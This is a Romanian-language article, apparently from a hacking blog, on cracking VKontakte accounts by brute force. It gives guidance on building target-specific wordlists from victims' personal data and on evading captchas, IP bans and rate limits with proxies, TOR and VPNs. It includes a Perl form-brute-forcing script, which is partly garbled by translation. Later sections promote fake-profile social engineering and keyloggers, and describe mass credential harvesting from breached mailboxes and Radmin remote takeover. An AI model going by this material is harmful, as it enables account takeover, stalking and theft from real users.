Descărcați programul Brut pentru VKontakte. Program gratuit pentru hacking VKontakte

Brute force - forță brută, hacking cu forță brută
În articolul „” se spunea că piratarea VK folosind forța brută (program) este imposibilă.
Acest lucru nu este în întregime adevărat, există încă lacune...
Mai jos este un scenariu de lucru, dar mai întâi...

În partea de jos a articolului este un program gratuit pentru generarea unui dicționar brut și o listă de „parole cele mai bune”

Îmi fac o rezervare în avans că vorbim despre o „forță brută” clasică fără algoritmi PBKDF2, fără parsing sha hashing, deoarece la nivel de zi cu zi aceasta este o sarcină copleșitoare.

Există multe programe care circulă pe Internet „pentru a pirata VK folosind forța brută (forța brută)”

Pe care să o aleg? Care mă va ajuta (fără să-mi facă rău)?
- Nici unul

Fiecare cont VK necesită o abordare personală, iar programele șablon din rețea sunt toate prostii, înșelătorii, prostii.

Acum vei înțelege de ce. Partea matematică pe scurt.

Lungimea minimă a unei parole VK este de 6 caractere.

Parola trebuie să conțină:
numere(0-9 - 10 opțiuni),
scrisori(a-z - 26 în latină),
majuscule(A-Z - de asemenea 26)

Total pentru fiecare simbol - 10+26+26=62 (!) opțiuni, deci numărul de combinații pentru:
Parolă de 6 caractere - 56.800.235.584 (56,8 miliarde)
Parolă de 7 caractere - 3.521.614.606.208 (3,5 trilioane)
Parola de 8 caractere - 218.340.105.584.896 (218 trilioane)
Parolă de 9 caractere -13 537 086 546 263 600 (HZ cum se numește))))

Nu știm lungimea parolei, așa că va trebui să forțăm un interval de cel puțin 6-8 caractere
Total: 6+7+8 caractere = 221.918.520.426.688 (222 trilioane) opțiuni

Să presupunem că aveți un computer destul de bun, dar apare întrebarea - câte solicitări la serverul VK poate face?
Care este viteza de căutare a unui computer de acasă?

Hai să facem calculul. Pentru a face acest lucru, deschideți linia de comandă (Start - standard - Command Prompt sau lansați procesul cmd.exe)
Introduceți comanda și obțineți răspunsul serverului

„Răspuns de la .....time 134ms” (acesta este pentru mine, timpul dvs. poate diferi)

Timpul de ping este timpul necesar pentru ca semnalul să circule de la aparatul nostru la server și înapoi

Există 1000 de milisecunde (ms) într-o secundă, deci
Viteza brută de la mașina dvs. (cereri/sec) va fi = 1000/timp de răspuns
În cazul meu, 1000/134ms = 7,4 solicitări (parole) pe secundă

Cât timp va dura căutarea parolelor pentru VK?

Permiteți-mi să vă reamintesc că încercăm 221.918.520.426.688 (222 trilioane) de opțiuni de parolă.

Prin urmare, pentru a afla cât de mult vom sparge parola VK prin forță brută, împărțim suma la viteză, adică.

221918520426688 parole / 7,4 parole pe secundă = 29737081737176sec = 495618028953 min = 8260300483 ore = 344179187 zile = 942957 ani

Concluzie:un program real pentru hacking VK ar putea găsi o parolă prin forță brută în 94 de mii de ani.

Întrebare: Cum rămâne cu videoclipurile de pe YouTube în care programe miracle forțează brute o pagină VK în câteva minute/ore?
Răspund: Aceasta este o înșelătorie creată cu scopul de a vă infecta computerul pentru a vă fura propriile date. Nici mai mult - nici mai puțin.

Puteți accelera semnificativ procesul de căutare!
Pentru a face acest lucru aveți nevoie de:
1. Creșteți puterea de calcul. De exemplu, infectați 1.000.000 de computere ale altor persoane și, simultan, forța brută VK de la toate (este amuzant)
2. Scurtați dicționarul Brute la, de exemplu, câteva mii (pe baza principiului ingineriei sociale)

Cum se face un dicționar Brute?
1. Utilizarea pixurilor în programul Notepad (notepad.exe)
2. Prog „brutus generator” (link în partea de jos a articolului)

Umplem acest dicționar brut cu opțiuni reale.

Cele reale sunt cele care sunt cel puțin legate de persoana piratată:

-telefoane(el, rudele, prietenii lui)
Exemplu- numere cu +7, 8, fără 8 - rareori văzute

- datele de naștere(el, rudele lui, cei dragi)
Exemplu- (aceeași dată) 010118, 01012018, 20180101, 180101 - apare des

- Numele celor dragi
Exemplu- SashaMaria, MariaIvanova, SaNoMaIv - vine peste medie

Numele site-ului (sau numele de familie) pe un aspect diferit
Exemplu, dacă tastați cuvântul „vkontakte” pe tastatura rusă, veți obține „mlshtefleu” - o astfel de schemă apare foarte des pe toate site-urile.

- Lista de parole a lui Lohov pentru Brutus(lista celor mai comune parole de pe Internet - link la sfârșitul articolului)

Cât durează să scrii un dicționar? Ei bine, nu chiar - o jumătate de oră este suficientă. Cine a spus că va fi ușor?))

Să presupunem că avem un dicționar brut creat și un program de lucru pentru selectarea unei parole VK (sau introducerea manuală a acesteia folosind un dicționar).

Apare o problemă importantă - sistemul de securitate al serverului.

De fapt, obstacolul ei constă în faptul că, dacă solicitările sunt prea dese, serverul îți blochează (temporar) IP-ul. În plus, dacă lucrați cu VK printr-un formular de introducere standard (HTML\FORM), atunci după a treia încercare nereușită, VK vă va cere să introduceți un captcha.

În versiunea veche a VK, puteți trece pur și simplu la versiunea mobilă - m.vk.com, dar acum nu există nicio versiune mobilă ca atare - în 2016 au realizat un singur design adaptiv.

Cum să ocoliți VKontakte captcha?

VK necesită introducerea unui captcha după 3 încercări nereușite (repornirea F5 nu ajută), dar de unde știe că esti tuÎncercați să vă conectați de mai multe ori?

Prin IP
- prin cookie-uri, cache și JavaScript

Nu există probleme cu cookie-urile, memoria cache și JavaScript - le puteți dezactiva pur și simplu în setările browserului.

IP-ul poate fi schimbat prin instalarea unui program pentru schimbarea IP - nu este nimic complicat, există o mulțime de ele pe Internet (Google poate ajuta)

Puteți folosi browserul TOR (pentru cei care nu știu, acesta este un browser pentru navigarea anonimă în rețea, schimbă și numerele IP cu fiecare sesiune nouă, lucru util mai ales pentru cei care navighează sau lucrează în SAR)

Dar toate încercările de forță brută sunt aproape complet anulate de GEOLOCARE.

Serverul VK își amintește unde (din punct de vedere geografic) a fost făcută ultima conectare.

Și dacă IP-ul tău este din altă localitate, atunci (eventual) va apărea următorul mesaj:

— Încercați să vă conectați sub numele de Ivan Ivanov dintr-un loc neobișnuit.

Pentru a confirma că sunteți cu adevărat proprietarul paginii, vă rugăm să furnizați toate cifrele lipsă ale numărului de telefon la care este legată pagina.

Script pentru formulare web brute (cum ar fi un program pentru hacking VK)

Important! Pe serverul VK există un script care monitorizează frecvența de trimitere a pachetelor, adică. dacă bateți cu ciocanul cu o viteză de N ori/sec, veți fi trimis automat la lista IP ban.
VK folosește și urmărirea GEO.

Fără un IP dinamic, nu ar trebui să încercați să faceți brute, un VPN vă poate ajuta.
Personal, consider că parolele VK cu forțare brută nu sunt promițătoare, dar pentru cunoscători voi posta un script Perl vechi împrumutat de la 5p4x2knet a.k.a. Apocaliptic și puțin fix.

Scriptul funcționează folosind metoda POST numai în doi parametri - log inŞi parolă.

Dacă autentificarea este cunoscută (de exemplu, un număr de telefon), atunci pur și simplu completați câmpurile corespunzătoare cu valoarea fără a vă referi la dicționar.

Câmpuri ascunse - captcha, scriptul nu va transmite imagini, ascunde sursa solicitărilor (dvs.) așa cum este descris mai sus.

Aici vom avea nevoie de dicționarul Brute sănătos pe care l-am compilat la începutul articolului. (să-i spunem, de exemplu, brutal.txt )

Avem nevoie și de un fișier din care programul nostru va primi informații.

Programul va forța brută toate scripturile specificate în acest fișier.( info.txt). Dacă există un singur script, atunci puteți înlocui

Desigur, fișierul pentru înregistrarea rezultatelor ( rezultat.txt)

Aşa,
{
#conectați obiectul
$usagent = LWP::UserAgent
#deschideți fișierul cu informații (dacă nu îl putem deschide, atunci ieșiți);
# aruncați fișierul în matricea @infa și închideți-l. (dacă există un singur script, atunci îl puteți specifica imediat)
deschis(INFA, ";
aproape(INFA);
#deschideți dicționarul Brute
deschis(BRUT, ";
aproape(BRUT);
#deschiderea unui fișier cu rezultate (se atașează la sfârșit).
deschide(REZULTAT, ">>$ARGV");
#începutul ciclului
foreach $name (@infa)
{
#separate URL, autentificare, variabile și informații despre erori
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#show URL
printează „$url...n”;
#începerea unui alt ciclu
foreach $brut (@brut)
{
#ucide spații și întreruperi de linie
$pss =~ s/ //;
$pss =~ s/n//;
#conectați un obiect nou
$usagent = LWP::UserAgent->new();
#crearea cererilor.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");
#și trimiterea sa
$rezultat = $utilizant -> cerere($req);
#stocarea rezultatelor într-o variabilă
$res = $rezultat->conținut;
#dacă nu funcționează, este generat un mesaj de eroare
if($res!~ /$failed/i)
{
#output mesaj cu parola; înregistrarea rezultatelor;
print "brutword găsit. Este n$pssnn";
print RESULT "URL: $urlnLOGIN: $loginnBRUT: $pssnn";
#otherwise a continuat selecția
dura;
}
}
}
#închiderea fișierului result.txt
inchide(REZULTAT);

Da, există. În general, există multe astfel de programe.

Și suntem împotriva unor astfel de programe.

Dar, deoarece există o anumită cerere pentru astfel de programe, să ne uităm la care dintre ele sunt „relativ” legale și care sunt mai bine să nu le folosiți deloc.
Inițial, chiar de la crearea VKontakte, au existat, de exemplu, programe precum aplicațiile de forță brută.
Astfel de programe sunt angajate în căutarea tuturor parolelor care există. Pentru aceasta, sunt utilizați atât algoritmi convenționali pas cu pas, cât și așa-numiții algoritmi. Tabelele curcubeu în care valorile sunt împrăștiate aleatoriu în funcție de cea mai bună distribuție - conform autorilor celor mai recente programe, distribuția aleatorie poate reduce timpul de căutare a parolei, deoarece căutarea nu va începe de la bun început, dar aleatoriu și, în medie, calea către litera dorită va fi mai scurtă.
Nu recomandăm deloc utilizarea programelor de forță brută. Există o varietate de programe pentru piratarea VKontakte și, prin urmare, este mai bine să nu folosiți „pătrunderea” brută într-o pagină, în plus, utilizatorul însuși poate suspecta ceva și poate șterge pagina, crea alta sau îi poate schimba adresa. Si in plus, Administrația VK vă va bloca prin IP și poate începe procedurile legale pentru atacarea serverelor de conectare și încălcarea stabilității acestora, precum și pentru încercarea de a pătrunde în corespondența altcuiva.

Deci, programele pentru piratarea VKontakte folosind forța brută sunt ilegale. Ce altele mai sunt?

În general, veți avea întotdeauna timp să descărcați gratuit programul de hacking VKontakte. Chiar sunt o mulțime. Să ne uităm la ce modalități legale există de a pătrunde în pagina altcuiva.
În primul rând, acestea sunt aplicații. Aplicațiile au o mulțime de informații despre utilizator. De obicei, utilizatorii nu citesc solicitările care sunt prezentate înainte de lansarea aplicației. Și acolo aplicația are acces deplin la datele personale, lista de prieteni, perete și așa mai departe. Mesajele personale, desigur, rămân necunoscute aplicației, dar Cunoscând cantitatea colosală de informații personale ascunse anterior în spatele setărilor de confidențialitate, puteți efectua escrocherii în domeniul ingineriei sociale și vă puteți implica în „atragerea” de informații despre utilizator de la cei mai apropiați prieteni ai săi.
Cu toate acestea, acest lucru nu este în întregime legal - pot apărea probleme din cauza faptului că, dacă utilizatorul Dacă ghicește că aplicația a fost cea care a scurs datele, atunci, desigur, va depune plângere împotriva acesteia, iar aplicația va fi blocată.În general, metoda este bună, dar cade rapid sub suspiciune. Da si a face o aplicație este încă o bătaie de cap.
Să mergem mai departe.

De unde pot descărca în mod normal un program pentru hacking pagini VKontakte care va fi legal?

În primul rând, să fim clari - suntem mulțumiți doar de ingineria socială. Practic, dacă este folosită corect, ingineria socială ne va ajuta să extragem toate datele de care avem nevoie de la un utilizator fără a-i sparge pagina. Deși puteți obține și acces complet la pagină.
Deci, ce programe sociale există pentru hacking VKontakte pe care le puteți descărca gratuit?
În primul rând, este de remarcat botul Brobot.
Folosirea lui pentru hacking, desigur, este o metodă destul de ciudată de a controla acest program, dar, în principiu, Funcționalitatea de acolo este necesară și suficientă pentru hacking.
Putem „opta” botul cu utilizatorul însuși, împotriva prietenilor săi, folosind capacitățile de a adăuga prieteni și corespondență personală. Să conectăm botul III pentru conversații, setându-l pe cel mai prietenos ton. Și după aceea, puteți deja să culegeți beneficiile învățând o mulțime de lucruri interesante despre utilizator în istoria corespondenței pe care Brobot a salvat-o.
După aceasta, puteți trimite utilizatorului, de exemplu, keylogger și prinde ceea ce le scrie altor utilizatori– de fapt, după aceasta nu va trebui să descărcați programe speciale pentru hacking VKontakte. Va fi suficient doar pentru a monitoriza utilizatorul. Cu toate acestea, puteți face și fără un keylogger!

Cum ne pot ajuta programele de hacking VKontakte precum Brobot?

În primul rând, să definim ce Brobot nu pirata paginile. Toate activitățile noastre sunt absolut legale, nimeni nu ne poate da în judecată, nimeni nu ne poate bloca - totul este absolut corect (în măsura în care avem nevoie).
Pur și simplu, de fapt, creăm mai multe pagini (Este mai bine să cumpărați imediat nelimitat, acest lucru este garantat pentru a crește volumul de informații extrase), iar din ele comunicăm deja cu utilizatorul, care ne permite să aflăm atitudinea lui față de o varietate de personalități, precum și să obținem un portret al lui însuși, al prietenilor săi, al rudelor sale și așa mai departe - și asta este, în esență, ceea ce avem nevoie.Și în viitor puteți efectua acțiuni și mai interesante și mai complexe, iar aici totul depinde de dorințele și imaginația voastră.
Programul Brobot va deveni bunul tău asistent, iar echipa de asistență Brobot, disponibilă aproape non-stop, îți va răspunde la toate întrebările tehnice.

Forța brută (derivată din expresia engleză: forța brută) este un tip de atac al hackerilor - o metodă de a pirata conturi în sisteme informatice, servicii de plată/bancare și site-uri web prin selectarea automată a combinațiilor de parole și autentificare.

Forța brută se bazează pe metoda matematică cu același nume (forța brută), în care soluția corectă - un număr finit sau combinație simbolică - se găsește prin căutarea prin diferite opțiuni. De fapt, fiecare valoare dintr-un set dat de răspunsuri potențiale (soluții) este verificată pentru corectitudine.

Cum funcționează forța brută

Un hacker scrie un program special pentru a ghici parolele sau folosește o soluție gata făcută de la colegii săi. Poate fi direcționat către un anumit serviciu de e-mail, site web, rețea socială (adică este destinat să pirateze o anumită resursă). În continuare, se efectuează pregătirile pentru hacking. Acesta constă din următorii pași:

1. Întocmirea unei liste de proxy

Pentru a ascunde adevărata adresă IP a computerului de pe care va fi efectuat atacul și pentru a preveni blocarea site-ului unde trebuie piratat contul, se configurează o conexiune la Internet printr-un server proxy.

Căutarea adreselor/porturilor proxy se efectuează în Proxy Grabber. Acest utilitar preia independent toate datele pentru conectarea la servere intermediare de pe site-urile care furnizează proxy (sunt specificate în listă). Cu alte cuvinte, se colectează un proxy.

Baza de date rezultată este salvată într-un fișier text separat. Și apoi toate adresele de server conținute în acesta sunt verificate pentru funcționalitate în verificatorul proxy. Destul de des, programele concepute pentru extragerea automată de proxy combină atât funcțiile unui grabber, cât și ale unui verificator.

Ca rezultat, obțineți o listă de proxy gata făcută sub forma unei liste de IP/port, salvată într-un fișier txt. (Veți avea nevoie de el când configurați programul de forță brută).

1. Căutați baze pentru Brute

Trebuie să conectați un dicționar la forța brută - un anumit set de combinații de parole și autentificare - pe care îl va înlocui în formularul de conectare. Ea, ca și lista proxy, are forma unei liste într-un fișier text obișnuit (.txt). Dicționarele, cunoscute și ca baze de date, sunt distribuite prin forumuri de hackeri, site-uri web și servicii de găzduire a fișierelor. „Meșteri” mai experimentați le creează singuri și le oferă tuturor contra cost. Cu cât baza este mai mare (număr de combinații, autentificări, conturi), cu atât mai bine (pentru hacker) - cu atât este mai mare probabilitatea de succes a hackingului.

1. Stabilirea forței brute

Lista proxy este încărcată; programul de selecție va schimba automat proxy-ul astfel încât serverul web să nu detecteze atacul și, în consecință, sursa (gazdă) atacului.

Este conectat un dicționar de combinații de parolă/login. Numărul de fire este setat - câte combinații va verifica forța brută în același timp. Un computer puternic cu viteză mare de internet poate gestiona cu încredere 120-200 de fluxuri (aceasta este valoarea optimă). Viteza brutei depinde direct de această setare. De exemplu, dacă setați doar 10 fire, selecția va fi foarte lentă.

1. A alerga cu forța brută

Programul înregistrează încercările de hacking reușite: salvează conturile conectate (parolă/login) într-un fișier. Durata procedurii de selecție variază de la câteva ore la câteva zile. Cu toate acestea, nu este întotdeauna eficient din cauza puterii criptografice ridicate a datelor de conectare sau a implementării altor măsuri de protecție de către atacator.

Tipuri de forță brută

Hacking personal

Vânătoare pentru un anumit cont - pe o rețea socială, pe un serviciu de e-mail etc. Prin sau în procesul de comunicare virtuală, atacatorul extrage de la victimă un login pentru a accesa un site web. Apoi sparge parola folosind metode de forță brută: folosește forța brută pentru a indica adresa resursei web și autentificarea obținută și conectează dicționarul.

Șansele unui astfel de hack sunt mici, de exemplu, în comparație cu același atac XSS. Poate avea succes dacă proprietarul contului a folosit o parolă de 6-7 caractere cu o combinație simplă de simboluri. În caz contrar, „rezolvarea” variantelor mai stabile de 12, 15, 20 de litere, numere și caractere speciale va dura ani - zeci și sute de ani, pe baza calculelor formulei de căutare matematică.

Brut/cec

O bază de date cu date de conectare/parole din cutiile poștale ale unui serviciu de e-mail (de exemplu, mail.ru) sau ale altora diferite este conectată la forța brută. Și o listă de proxy - pentru a masca nodul (din moment ce serviciile web de e-mail detectează rapid un atac bazat pe mai multe solicitări de la o adresă IP).

Opțiunile brutei indică o listă de cuvinte cheie (de obicei nume de site) - repere după care va căuta informații de autentificare pe cutiile poștale piratate (de exemplu: steampowered, worldoftanks, 4game, VK). Sau o anumită resursă de internet.

Când se înregistrează într-un joc online, rețea socială sau forum, un utilizator, așa cum era de așteptat, își indică adresa de e-mail (căsuța poștală). Serviciul web trimite un mesaj la adresa specificată cu informații de conectare și un link pentru a confirma înregistrarea. Aceste litere sunt pe care forța brută le caută pentru a extrage date de conectare și parole din ele.

Faceți clic pe „START” și programul de cracare începe cu forța brută. Funcționează conform următorului algoritm:

1. Încarcă login/parola pentru e-mail din baza de date.
2. Verifică accesul, sau „verifică” (se autentifică automat): dacă este posibil să te autentifici în cont, acesta adaugă unul în coloana bună (asta înseamnă că a fost găsit un alt e-mail de serviciu) și începe să-l vizualizeze (vezi următoarele puncte ); dacă nu există acces, este listat ca rău.
3. În toate „beep-urile” (e-mailuri deschise), forța brută scanează scrisorile conform solicitării specificate de hacker - adică caută login-uri/parole pentru site-urile și sistemele de plată specificate.
4. Când datele necesare sunt găsite, le copiază și le scrie într-un fișier separat.

Astfel, are loc o „deturpare” masivă a conturilor – de la zeci la sute. Atacatorul dispune de „trofeele” obținute la propria discreție - vânzare, schimb, colectare de date, furt de bani.

Hacking computer la distanță

Forța brută, împreună cu alte utilitare de hacker, este folosită pentru a obține acces de la distanță la computerul victimei protejat prin parolă prin intermediul unui canal de internet.

Acest tip de atac constă din următoarele etape:

1. Se efectuează o căutare a rețelelor IP în care va fi efectuat atacul asupra computerelor utilizatorilor. Intervalele de adrese sunt preluate din baze de date speciale sau prin programe speciale, cum ar fi IP Geo. În el puteți selecta rețele IP pentru un anumit district, regiune și chiar oraș.
2. Intervalele IP selectate și dicționarele de selecție sunt setate în setările forței brute Lamescan (sau analogului său), destinate login/parolă de la distanță brute force. Odată lansat, Lamescan face următoarele:

• realizează o conexiune la fiecare IP dintr-un interval dat;
• după stabilirea unei conexiuni, încearcă să se conecteze la gazdă (PC) prin portul 4899 (dar pot exista și alte opțiuni);
• dacă portul este deschis: încearcă să obțină acces la sistem, atunci când i se cere o parolă, efectuează ghicit; dacă reușește, salvează adresa IP a gazdei (calculatorului) și informațiile de conectare în baza sa de date.

1. Hackerul lansează utilitarul Radmin, conceput pentru a gestiona computerele la distanță. Setează coordonatele rețelei victimei (IP, autentificare și parolă) și obține control deplin asupra sistemului - desktop (afișat vizual pe afișajul computerului atacatorului), directoare de fișiere, setări.

Programe pentru Brutus

HASHCAT

Pentru 2020, unul dintre cele mai puternice programe pentru brute. Utilizează peste 200 de algoritmi de forță brută. Folosit pe scară largă pentru ghicirea parolelor WPA/WPA2, precum și a parolelor pentru documente MS Office, PDF, 7-Zip, RAR, TrueCrypt.

Forța brută clasică, una dintre primele. Cu toate acestea, nu își pierde relevanța și concurează cu soluții noi. Are un algoritm rapid de forță brută și acceptă toate protocoalele Internet majore - TCP/IP, POP3, HTTP etc. Poate falsifica cookie-uri. Bruteste dicționarul și generează parole în mod independent.

Puternic verificator brut. Echipat cu un arsenal extins de funcții pentru lucrul cu baze de date (verificare, sortare după domeniu). Acceptă diferite tipuri de proxy și verifică funcționalitatea acestora. Scanează scrisorile din cutiile poștale pe baza setărilor precum data, cuvântul cheie, adresa, mesajele necitite. Pot descărca scrisori de pe Mail.ru și Yandex.